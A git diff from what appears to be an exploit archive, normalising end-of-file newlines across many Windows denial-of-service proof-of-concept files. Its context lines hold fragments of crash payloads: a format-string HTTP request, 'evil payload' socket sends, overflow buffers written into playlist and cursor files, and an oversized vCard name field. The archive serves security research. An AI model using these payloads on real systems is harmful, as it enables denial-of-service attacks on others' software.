print "Something goes wrong honey..." \ No newline at end of file diff --git a/platforms/windows/dos/3331.c b/platforms/windows/dos/3331.c index a3a124155..c4f3784cf 100755 --- a/platforms/windows/dos/3331.c +++ b/platforms/windows/dos/3331.c @@ -88,4 +88,4 @@ int main(int argc, char* argv[]) return 0; } -// milw0rm.com [2007-02-18] +// milw0rm.com [2007-02-18] \ No newline at end of file diff --git a/platforms/windows/dos/33348.pl b/platforms/windows/dos/33348.pl index 2d68b8777..0af80f95f 100755 --- a/platforms/windows/dos/33348.pl +++ b/platforms/windows/dos/33348.pl @@ -36,4 +36,4 @@ for (my $j = 0; $j < 2; $j++) } } -exit; +exit; \ No newline at end of file diff --git a/platforms/windows/dos/33350.xml b/platforms/windows/dos/33350.xml index 1bdab7f5d..3b0268fca 100755 --- a/platforms/windows/dos/33350.xml +++ b/platforms/windows/dos/33350.xml @@ -23,4 +23,4 @@ target.RegisterMe arg1 </job> -</package> +</package> \ No newline at end of file diff --git a/platforms/windows/dos/33403.py b/platforms/windows/dos/33403.py index c2d5e6c51..d7ae66f1f 100755 --- a/platforms/windows/dos/33403.py +++ b/platforms/windows/dos/33403.py @@ -26,4 +26,4 @@ s.send("protocol version = 1.10; " +"dhcp = off; " +"pswd = off; " +"hn = "+"A"*0×60+"; " - +"dns1 = 192.168.1.33;") + +"dns1 = 192.168.1.33;") \ No newline at end of file diff --git a/platforms/windows/dos/3341.cpp b/platforms/windows/dos/3341.cpp index 60f29b5e6..cfb618ed6 100755 --- a/platforms/windows/dos/3341.cpp +++ b/platforms/windows/dos/3341.cpp @@ -178,4 +178,4 @@ int main(int argc, char* argv[]) return 0; } -// milw0rm.com [2007-02-20] +// milw0rm.com [2007-02-20] \ No newline at end of file diff --git a/platforms/windows/dos/3343.cpp b/platforms/windows/dos/3343.cpp index 1c4eb47ca..d6b2a432a 100755 --- a/platforms/windows/dos/3343.cpp +++ b/platforms/windows/dos/3343.cpp @@ -116,4 +116,4 @@ int main(int argc, char* argv[]) return 0; } -// milw0rm.com [2007-02-20] +// milw0rm.com [2007-02-20] \ No newline at end of file diff --git a/platforms/windows/dos/3347.cpp b/platforms/windows/dos/3347.cpp index 852cc2781..ef61711c2 100755 --- a/platforms/windows/dos/3347.cpp +++ b/platforms/windows/dos/3347.cpp @@ -88,4 +88,4 @@ int main(int argc, char* argv[]) } -// milw0rm.com [2007-02-20] +// milw0rm.com [2007-02-20] \ No newline at end of file diff --git a/platforms/windows/dos/33495.py b/platforms/windows/dos/33495.py index bae147b85..dea54bb43 100755 --- a/platforms/windows/dos/33495.py +++ b/platforms/windows/dos/33495.py @@ -56,4 +56,4 @@ else: second.recv(1024) print "[+] By now, Core FTP Server should had crashed and will not accept new connections." second.close() - sys.exit(0) + sys.exit(0) \ No newline at end of file diff --git a/platforms/windows/dos/3350.html b/platforms/windows/dos/3350.html index 3106358be..3ecfce566 100755 --- a/platforms/windows/dos/3350.html +++ b/platforms/windows/dos/3350.html @@ -46,4 +46,4 @@ </span></span> </code></pre> -# milw0rm.com [2007-02-21] +# milw0rm.com [2007-02-21] \ No newline at end of file diff --git a/platforms/windows/dos/33640.py b/platforms/windows/dos/33640.py index b213a7e7b..bd8527f52 100755 --- a/platforms/windows/dos/33640.py +++ b/platforms/windows/dos/33640.py @@ -50,4 +50,4 @@ buffer = header + crash +align+padd +'\n' file=open('ss.m3u','w') file.write(buffer) file.close() -print "[+] ss.m3u file created successfully" +print "[+] ss.m3u file created successfully" \ No newline at end of file diff --git a/platforms/windows/dos/33713.py b/platforms/windows/dos/33713.py index 76fcb610e..cf17380e2 100755 --- a/platforms/windows/dos/33713.py +++ b/platforms/windows/dos/33713.py @@ -118,4 +118,4 @@ except error as e: print e finally: conn.close() - s.close() + s.close() \ No newline at end of file diff --git a/platforms/windows/dos/33719.py b/platforms/windows/dos/33719.py index 6cb40ac96..178ba7783 100755 --- a/platforms/windows/dos/33719.py +++ b/platforms/windows/dos/33719.py @@ -176,5 +176,4 @@ html = '<HEAD><META http-equiv="refresh" content="0"/></HEAD>' + \ '<BODY style="cursor:url(repro.ani)"></BODY>'; Save('repro.ani', riff_chunk); -Save('repro.html', html); - +Save('repro.html', html); \ No newline at end of file diff --git a/platforms/windows/dos/33733.pl b/platforms/windows/dos/33733.pl index a442e0c66..eae87306c 100755 --- a/platforms/windows/dos/33733.pl +++ b/platforms/windows/dos/33733.pl @@ -59,4 +59,4 @@ $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => print "\n[+] Done.\n\n"; -close($socket); +close($socket); \ No newline at end of file diff --git a/platforms/windows/dos/33778.pl b/platforms/windows/dos/33778.pl index 4ec03ff46..23697dedc 100755 --- a/platforms/windows/dos/33778.pl +++ b/platforms/windows/dos/33778.pl @@ -70,4 +70,4 @@ $payload = "/index.html" . "%x" x 90 . "A" x 250 . "%x" x 186 ."%.999999x" x 15 print "[+] Sending Malicious Request\n"; print $remote "GET $payload HTTP/1.1\r\n"; -close $remote; +close $remote; \ No newline at end of file diff --git a/platforms/windows/dos/33804.pl b/platforms/windows/dos/33804.pl index dcc36715d..832ba3877 100755 --- a/platforms/windows/dos/33804.pl +++ b/platforms/windows/dos/33804.pl @@ -120,4 +120,4 @@ print $conn2 "\x43"x1000; # SC contain print "\x20\x1c\x20Payload sent\n"; print "\x20\x1c\x20Second stage completed\n"; close $conn2; -print "\x20\x1c\x20t00t!\n"; +print "\x20\x1c\x20t00t!\n"; \ No newline at end of file diff --git a/platforms/windows/dos/33819.txt b/platforms/windows/dos/33819.txt index 24030bd94..787a73adb 100755 --- a/platforms/windows/dos/33819.txt +++ b/platforms/windows/dos/33819.txt @@ -36,5 +36,4 @@ If you want to check the new privilege: *** Invalid command: Usage - set user unlock <USER ID> *** [Secure Mail]: cmd_admin set user unlock admin Cannot unlock yourself. -[Secure Mail]: exi - +[Secure Mail]: exi \ No newline at end of file diff --git a/platforms/windows/dos/33838.py b/platforms/windows/dos/33838.py index 382806051..3353bb809 100755 --- a/platforms/windows/dos/33838.py +++ b/platforms/windows/dos/33838.py @@ -70,4 +70,4 @@ s.send("\x02") print "[+] Sending evil payload.. ph33r o.O" s.send(exploit) print '[+] Server DoSed!' -s.close() +s.close() \ No newline at end of file diff --git a/platforms/windows/dos/3385.pl b/platforms/windows/dos/3385.pl index 25bb1734a..ad30c53fc 100755 --- a/platforms/windows/dos/3385.pl +++ b/platforms/windows/dos/3385.pl @@ -45,4 +45,4 @@ print "Done!\n"; $ftp->quit; -# milw0rm.com [2007-02-28] +# milw0rm.com [2007-02-28] \ No newline at end of file diff --git a/platforms/windows/dos/3392.html b/platforms/windows/dos/3392.html index 69aeff6e0..c718f6d97 100755 --- a/platforms/windows/dos/3392.html +++ b/platforms/windows/dos/3392.html @@ -87,4 +87,4 @@ That's a dump from faultmon </span></span> </code></pre> -# milw0rm.com [2007-03-01] +# milw0rm.com [2007-03-01] \ No newline at end of file diff --git a/platforms/windows/dos/33924.py b/platforms/windows/dos/33924.py index a6ae9b3bd..efdde29c2 100755 --- a/platforms/windows/dos/33924.py +++ b/platforms/windows/dos/33924.py @@ -69,6 +69,4 @@ def crash_vnc_server(): except Exception: print 'Couldn\'t connect' -crash_vnc_server() - - +crash_vnc_server() \ No newline at end of file diff --git a/platforms/windows/dos/33926.py b/platforms/windows/dos/33926.py index ef4c8368c..591f86ebf 100755 --- a/platforms/windows/dos/33926.py +++ b/platforms/windows/dos/33926.py @@ -62,5 +62,4 @@ try: pass except Exception: - print 'couldn\'t connect' - + print 'couldn\'t connect' \ No newline at end of file diff --git a/platforms/windows/dos/33951.txt b/platforms/windows/dos/33951.txt index 9ecb74a2c..1cd7c0abb 100755 --- a/platforms/windows/dos/33951.txt +++ b/platforms/windows/dos/33951.txt @@ -60,4 +60,4 @@ function crash(){ } </script> </body> -</html> +</html> \ No newline at end of file diff --git a/platforms/windows/dos/33973.pl b/platforms/windows/dos/33973.pl index ecd39b37c..e0e8a9d7b 100755 --- a/platforms/windows/dos/33973.pl +++ b/platforms/windows/dos/33973.pl @@ -34,4 +34,4 @@ my $junk = "\x41" x 3000; open(my $playlist, "> hyplay_d0s.asx"); print $playlist $data1.$data2.$junk.$data3."\r\n"; close $playlist; -print "\nEvil asx file created successfully."; +print "\nEvil asx file created successfully."; \ No newline at end of file diff --git a/platforms/windows/dos/3399.txt b/platforms/windows/dos/3399.txt index c097731bf..810a73a31 100755 --- a/platforms/windows/dos/3399.txt +++ b/platforms/windows/dos/3399.txt @@ -87,4 +87,4 @@ Version 2.12.1 ####################################################################### -# milw0rm.com [2007-03-02] +# milw0rm.com [2007-03-02] \ No newline at end of file diff --git a/platforms/windows/dos/3418.pl b/platforms/windows/dos/3418.pl index dd650f4d0..945bdfd88 100755 --- a/platforms/windows/dos/3418.pl +++ b/platforms/windows/dos/3418.pl @@ -81,4 +81,4 @@ sub connect_host { return(1337); } -# milw0rm.com [2007-03-06] +# milw0rm.com [2007-03-06] \ No newline at end of file diff --git a/platforms/windows/dos/3419.txt b/platforms/windows/dos/3419.txt index 05896e380..5230011ce 100755 --- a/platforms/windows/dos/3419.txt +++ b/platforms/windows/dos/3419.txt @@ -21,4 +21,4 @@ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3419.tar (03062007-Explorer_Crasher.tar) -# milw0rm.com [2007-03-06] +# milw0rm.com [2007-03-06] \ No newline at end of file diff --git a/platforms/windows/dos/3421.html b/platforms/windows/dos/3421.html index 411464ae4..34bb1f095 100755 --- a/platforms/windows/dos/3421.html +++ b/platforms/windows/dos/3421.html @@ -59,4 +59,4 @@ </span></span> </code></pre> -# milw0rm.com [2007-03-07] +# milw0rm.com [2007-03-07] \ No newline at end of file diff --git a/platforms/windows/dos/34233.py b/platforms/windows/dos/34233.py index 4fab6423d..578f7f8ef 100755 --- a/platforms/windows/dos/34233.py +++ b/platforms/windows/dos/34233.py @@ -103,7 +103,4 @@ Launching Sumatra PDF Reader and then using File/Open Ctrl+O to open\nthis file print("Written by : Azim Poonawala (QUAKERDOOMER) [ quakerdoomer [ @ ] fmguy.com ]\n\t\thttp:/solidmecca.co.nr\n\t\thttp://winautopwn.co.nr\n\t\thttp://my.opera.com/quakerdoomer"); except: - print "Error" - - - + print "Error" \ No newline at end of file diff --git a/platforms/windows/dos/3430.html b/platforms/windows/dos/3430.html index b61f430e7..8b6981342 100755 --- a/platforms/windows/dos/3430.html +++ b/platforms/windows/dos/3430.html @@ -69,4 +69,4 @@ party."); } </script> -# milw0rm.com [2007-03-08] +# milw0rm.com [2007-03-08] \ No newline at end of file diff --git a/platforms/windows/dos/3432.pl b/platforms/windows/dos/3432.pl index d954d8789..ccf6b9f23 100755 --- a/platforms/windows/dos/3432.pl +++ b/platforms/windows/dos/3432.pl @@ -40,4 +40,4 @@ else print "Cannot connect to $ARGV[0]:69\n"; } -# milw0rm.com [2007-03-08] +# milw0rm.com [2007-03-08] \ No newline at end of file diff --git a/platforms/windows/dos/3433.html b/platforms/windows/dos/3433.html index ab14e04a6..196af5724 100755 --- a/platforms/windows/dos/3433.html +++ b/platforms/windows/dos/3433.html @@ -28,4 +28,4 @@ Date: 08- Jan - 2007 </body> </html> -# milw0rm.com [2007-03-08] +# milw0rm.com [2007-03-08] \ No newline at end of file diff --git a/platforms/windows/dos/34368.c b/platforms/windows/dos/34368.c index d17e49234..9a8e894fa 100755 --- a/platforms/windows/dos/34368.c +++ b/platforms/windows/dos/34368.c @@ -29,4 +29,4 @@ char buffer[overflow]; fclose(Player); printf("\n Successfully !!"); return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/34395.pl b/platforms/windows/dos/34395.pl index d2c441814..78e49ab05 100755 --- a/platforms/windows/dos/34395.pl +++ b/platforms/windows/dos/34395.pl @@ -57,4 +57,4 @@ sub usage() { print "[-] Usage: <". $0 ."> <host> <port>\n"; print "[-] Example: ". $0 ." 127.0.0.1 80\n"; exit; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/34403.pl b/platforms/windows/dos/34403.pl index 9e3eb9446..55572352d 100755 --- a/platforms/windows/dos/34403.pl +++ b/platforms/windows/dos/34403.pl @@ -26,4 +26,4 @@ recv(SOCK, $content, 100, 0); #get ftp banner send(SOCK, "USER "."$payload\r\n", 0); printf("send ok!\n"); close(SOCK); -exit(0); +exit(0); \ No newline at end of file diff --git a/platforms/windows/dos/34404.pl b/platforms/windows/dos/34404.pl index 30d73e314..20aa8b2ae 100755 --- a/platforms/windows/dos/34404.pl +++ b/platforms/windows/dos/34404.pl @@ -29,5 +29,4 @@ $datos = $cabecera . $payload . $fin; open(FILE, '<' . $archivo); print FILE $datos; -close(FILE); - +close(FILE); \ No newline at end of file diff --git a/platforms/windows/dos/3444.pl b/platforms/windows/dos/3444.pl index c7e3b1bbc..48ae9707f 100755 --- a/platforms/windows/dos/3444.pl +++ b/platforms/windows/dos/3444.pl @@ -39,4 +39,4 @@ while (<$sock_in>){ } close($sock); -# milw0rm.com [2007-03-09] +# milw0rm.com [2007-03-09] \ No newline at end of file diff --git a/platforms/windows/dos/34442.html b/platforms/windows/dos/34442.html index c0a4662cb..e672c7c3d 100755 --- a/platforms/windows/dos/34442.html +++ b/platforms/windows/dos/34442.html @@ -18,4 +18,4 @@ target.ShowBar arg1 </script> </span></span> -</code></pre> +</code></pre> \ No newline at end of file diff --git a/platforms/windows/dos/34463.py b/platforms/windows/dos/34463.py index 5f4d0801b..9849045fc 100755 --- a/platforms/windows/dos/34463.py +++ b/platforms/windows/dos/34463.py @@ -43,4 +43,4 @@ try : except: print "[#] error to create file" -close = raw_input("\n[!] press any button to close()") +close = raw_input("\n[!] press any button to close()") \ No newline at end of file diff --git a/platforms/windows/dos/34480.py b/platforms/windows/dos/34480.py index 076aeb7ab..15fb0b06f 100755 --- a/platforms/windows/dos/34480.py +++ b/platforms/windows/dos/34480.py @@ -24,4 +24,4 @@ try: except: print "[+]Cannot create File\n" -################PoC End################################################ +################PoC End################################################ \ No newline at end of file diff --git a/platforms/windows/dos/345.c b/platforms/windows/dos/345.c index bcfaee8dd..228af9023 100755 --- a/platforms/windows/dos/345.c +++ b/platforms/windows/dos/345.c @@ -82,4 +82,4 @@ int main(int argc, char **argv) } -// milw0rm.com [2002-09-10] +// milw0rm.com [2002-09-10] \ No newline at end of file diff --git a/platforms/windows/dos/34502.py b/platforms/windows/dos/34502.py index 3348e00d5..609cabec4 100755 --- a/platforms/windows/dos/34502.py +++ b/platforms/windows/dos/34502.py @@ -46,5 +46,4 @@ exit(0) # \\//8@8@8@8@8@8 \_____________________________________/ OF SATANIC METAL POWER # `` `)| # (@| -# ` - +# ` \ No newline at end of file diff --git a/platforms/windows/dos/3453.py b/platforms/windows/dos/3453.py index 03793b083..4af2aa211 100755 --- a/platforms/windows/dos/3453.py +++ b/platforms/windows/dos/3453.py @@ -199,4 +199,4 @@ dce.disconnect() # EoF -# milw0rm.com [2007-03-10] +# milw0rm.com [2007-03-10] \ No newline at end of file diff --git a/platforms/windows/dos/34530.py b/platforms/windows/dos/34530.py index ccd5b9af4..8c3b5ef57 100755 --- a/platforms/windows/dos/34530.py +++ b/platforms/windows/dos/34530.py @@ -22,4 +22,4 @@ try: print "[+] Load this File to Crystal Player CPU Usage shoots upto 100%\n" print "[+] Coded by Praveen Darshanam\n" except: - print "[+] Unable to Create File" + print "[+] Unable to Create File" \ No newline at end of file diff --git a/platforms/windows/dos/34603.py b/platforms/windows/dos/34603.py index 23667caba..e83023f2b 100755 --- a/platforms/windows/dos/34603.py +++ b/platforms/windows/dos/34603.py @@ -103,4 +103,4 @@ def main(): if __name__=="__main__": print _doc_ - main() + main() \ No newline at end of file diff --git a/platforms/windows/dos/3461.pl b/platforms/windows/dos/3461.pl index d4bf50db1..74a6bf95a 100755 --- a/platforms/windows/dos/3461.pl +++ b/platforms/windows/dos/3461.pl @@ -46,4 +46,4 @@ else } # __END_CODE -# milw0rm.com [2007-03-12] +# milw0rm.com [2007-03-12] \ No newline at end of file diff --git a/platforms/windows/dos/3464.cpp b/platforms/windows/dos/3464.cpp index febdc944b..5dac53731 100755 --- a/platforms/windows/dos/3464.cpp +++ b/platforms/windows/dos/3464.cpp @@ -129,4 +129,4 @@ char header3[]="\r\n" } -// milw0rm.com [2007-03-12] +// milw0rm.com [2007-03-12] \ No newline at end of file diff --git a/platforms/windows/dos/34729.py b/platforms/windows/dos/34729.py index 7078e7ac7..3e885afee 100755 --- a/platforms/windows/dos/34729.py +++ b/platforms/windows/dos/34729.py @@ -24,4 +24,4 @@ print repr(s.recv(1024)) s.close() -#@retset +#@retset \ No newline at end of file diff --git a/platforms/windows/dos/34889.vcf b/platforms/windows/dos/34889.vcf index 48a7c0f11..d1e48a3de 100755 --- a/platforms/windows/dos/34889.vcf +++ b/platforms/windows/dos/34889.vcf @@ -8,4 +8,4 @@ Windows Mobile versions 6.1 and 6.5 are vulnerable; other versions may also be a BEGIN:VCARD VERSION:3.0 -N:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA